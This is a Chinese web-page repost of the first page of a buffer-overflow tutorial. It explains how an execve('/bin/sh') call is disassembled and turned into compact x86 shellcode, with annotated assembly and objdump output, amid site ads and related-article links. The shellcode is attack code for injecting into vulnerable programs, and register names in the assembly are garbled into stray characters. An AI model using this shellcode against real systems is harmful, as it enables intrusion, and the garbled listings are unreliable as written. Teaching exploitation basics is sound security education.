缓冲区溢出的解密方法
在C中,spawn出一个shell的代码可能象这样:
shell.c :
免费影视、动漫、音乐、游戏、小说资源长期稳定更新! 👉 点此立即查看 👈
#include
void main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
[murat@victim murat]$ make shell
cc -W -Wall -pedantic -g shell.c -o shell
[murat@victim murat]$ ./shell
bash$
如果你看execve的man说明页($man 2 execve),你将看到execve要求一个将要执行的文件名的指针,一个NULL终止的参数数组,和一个可以为NULL的环境指针。如果你编译运行了这个输出的二进制文件,你将看到你spawn出了一个新的shell。
目前为止一切顺利……但是我们不能用这种方式spawn出一个shell,是吗?我们如何能用这种方式把这个代码放到漏洞程序里去呢?我们不能!
这给我们造成了一个新问题:我们如何能把我们的攻击代码传给漏洞程序?我们将需要在易受攻击的缓冲区传递我们的代码,它很有可能是一段shell代码。为了实现这个目标,我们必须能够把我们的shell代码用一个字符串表示。
因此,我们将列出所有的来spawn出一个shell的汇编指令,得到它们的运算码,把它们一个一个列出来,然后把它们作为一个shell生成串组装起来。
首先,让我们看看上面的代码(shell.c)在汇编中是什么样子。让我们静态编译程序(这个方法,execve系统调用也将被反汇编)然后看:
[murat@victim murat]$ gcc -static -g -o shell shell.c
[murat@victim murat]$ objdump -d shell | grep \: -A 12
0804ca10 :
804ca10: 53 pushl 離
804ca11: 8b 54 24 10 movl 0x10(%esp,1),韝
804ca15: 8b 4c 24 0c movl 0xc(%esp,1),靫
804ca19: 8b 5c 24 08 movl 0x8(%esp,1),離
804ca1d: b8 0b 00 00 00 movl $0xb,陎
804ca22: cd 80 int $0x80
804ca24: 5b popl 離
804ca25: 3d 01 f0 ff ff cmpl $0xfffff001,陎
804ca2a: 0f 83 00 02 00 jae 804cc30
804ca2f: 00
804ca30: c3 ret
804ca31: 90 nop
[murat@victim murat]$
让我们一步一步地分析这个系统调用:
记住,在我们的main()函数里,我们写了代码:
execve(shell[0], shell, NULL)
我们传递了:
·字符串”/bin/sh”的地址
·NULL结尾数组的地址
·NULL(实际上它是环境地址)
此处,在main里面:
[murat@victim murat]$ objdump -d shell | grep \: -A 17
08048124 :
8048124: 55 pushl 雙
8048125: 89 e5 movl %esp,雙
8048127: 83 ec 08 subl $0x8,%esp
804812a: c7 45 f8 ac 92 movl $0x80592ac,0xfffffff8(雙)
804812f: 05 08
8048131: c7 45 fc 00 00 movl $0x0,0xfffffffc(雙)
8048136: 00 00
8048138: 6a 00 pushl $0x0
804813a: 8d 45 f8 leal 0xfffffff8(雙),陎
804813d: 50 pushl 陎
804813e: 8b 45 f8 movl 0xfffffff8(雙),陎
8048141: 50 pushl 陎
8048142: e8 c9 48 00 00 call 804ca10
8048147: 83 c4 0c addl $0xc,%esp
804814a: c9 lea ve
804814b: c3 ret
804814c: 90 nop
在调用execve(call 804ca10 )之前,我们反序把这些参数推入到堆栈中。
因此,如果我们回到__execve:
我们拷贝NULL字节到EDX寄存器,
804ca11: 8b 54 24 10 movl 0x10(%esp,1),韝
我们拷贝以NULL结尾数组的地址到ECX寄存器,
804ca15: 8b 4c 24 0c movl 0xc(%esp,1),靫
我们拷贝字符串"/bin/sh"的地址到EBX寄存器
804ca19: 8b 5c 24 08 movl 0x8(%esp,1),離
我们为execve拷贝系统索引,即11(oxb)到EAX寄存器:
804ca1d: b8 0b 00 00 00 movl $0xb,陎
接着变成核模式:
804ca22: cd 80 int $0x80
我们需要的全部就是这么多了。然而,这里还有一些问题。我们不能准确地知道NULL结束数组和”/bin/sh”字符串的地址。那么,这个怎么样?:
xorl 陎, 陎
pushl 陎
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,離
pushl 陎
pushl 離
movl %esp,靫
cdql
movb $0x0b,%al
int $0x80
让我解释一下上面的指令:
如果你进行自身异或,你得到0,等同于NULL。这里,我们在EAX寄存器中得到一个NULL。
xorl 陎, 陎
接着我们把NULL推入堆栈:
pushl 陎
我们把字符串”//sh”推入堆栈,
2f is /
2f is /
73 is s
68 is h
pushl $0x68732f2f
我们把字符串”/bin”推入堆栈:
2f is /
62 is b
69 is i
6e is n
pushl $0x6e69622f
可以猜想,现在堆栈指针地址就象我们的NULL结尾字符串”/bin/sh”的地址。因为,从指向栈顶的指针开始,我们有了一个NULL结尾的字符串数组。因此,我们拷贝堆栈指针到EBX寄存器。这样,我们就已经把”/bin/sh”的地址放到EBX寄存器中了。
movl %esp,離
接着我们需要用NULL结尾的数组地址设置ECX。为此,我们在我们的堆栈中创造了一个NULL结尾的数组,与上面那个很像:首先我们PUSH一个NULL。我们不能PUSH NULL,但是我们能PUSH值为NULL的东西,回顾我们异或EAX寄存器在那我们得到了NULL,因此让我们PUSH EAX来在堆栈中得到一个NULL。
pushl 陎
接着,我们PUSH我们的字符串的地址到堆栈,这等同于shell[0]:
pushl 離
现在我们有一个NULL结尾数组的指针,我们能够在ECX中保存它的地址:
movl %esp,靫
我们还需要其它什么呢?一个在EDX寄存器中的NULL。我们能movl 陎, 韝,但是我们能用一个短的指令完成这个操作:cdq。这个指令是把EAX中的符号位扩展到EDX。:
cdql
我们设定EAX 为0xb,这是系统调用表中的系统调用id。
movb $0x0b,%al
接着,我们转换到核模式:
int 0x80
之后,我们进到核模式,内核将调用exec函数执行我们指示给它的:/bin/sh 这样我们将进入一个交互shell……
上一页12 下一页 阅读全文
游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。
同类文章
ubuntu dumpcap如何进行网络攻击分析
Ubuntu系统dumpcap工具:网络攻击检测与流量分析实战指南 在网络安全监控与威胁狩猎中,网络数据包捕获是分析异常行为、识别恶意流量的核心技术。Ubuntu系统内置的dumpcap工具,作为一款轻量级抓包利器,能够高效捕获原始网络流量,为安全分析提供关键数据基础。本文将系统讲解如何利用dump
Linux环境下Tomcat安全漏洞防范
Linux环境下Tomcat安全漏洞防范 最近几个Tomcat安全漏洞值得所有运维和开发团队重点关注。下面这份指南,将帮你快速锁定风险、完成加固,并建立有效的防护基线。 一 近期漏洞与修复基线 如果你的环境中还在运行旧版本Tomcat,那么下面这几个漏洞需要优先处置。官方已经发布了修复版本,建议立即
Linux AppImage如何加密
Linux AppImage 加密与安全防护全面指南 核心结论与定位 首先需要明确的是,AppImage 格式本身并未集成内置的加密机制。如果您需要保护分发的应用程序包本身或其内部包含的敏感数据,就必须借助外部方案来实现。当前主流的解决方案主要围绕三个层面展开:“文件级加密”、“磁盘或目录级加密”以
怎样从dmesg中发现安全漏洞
dmesg:从内核日志中洞察安全线索 在Linux系统管理和故障排查的“兵器谱”里,dmesg(display message或driver message)绝对算得上是一把利器。它主要负责显示内核启动信息以及运行时的各种状态消息,是诊断硬件故障、驱动问题的首选工具。不过,你可能要问了:它和安全漏洞
如何避免Ubuntu Exploit漏洞
Ubuntu 防范漏洞利用的实用清单 面对层出不穷的安全威胁,被动防御往往力不从心。一份清晰、可操作的加固清单,是构建主动防御体系的关键起点。这份清单并非面面俱到的理论手册,而是聚焦于那些能真正阻断绝大多数常见攻击的实用措施。 核心原则 在深入具体操作之前,不妨先锚定几个核心原则。它们就像航海时的罗
- 日榜
- 周榜
- 月榜
1
2
3
4
5
6
7
8
9
10
相关攻略
2015-03-10 11:25
2015-03-10 11:05
2021-08-04 13:30
2015-03-10 11:22
2015-03-10 12:39
2022-05-16 18:57
2025-05-23 13:43
2025-05-23 14:01
热门教程
- 游戏攻略
- 安卓教程
- 苹果教程
- 电脑教程
热门话题

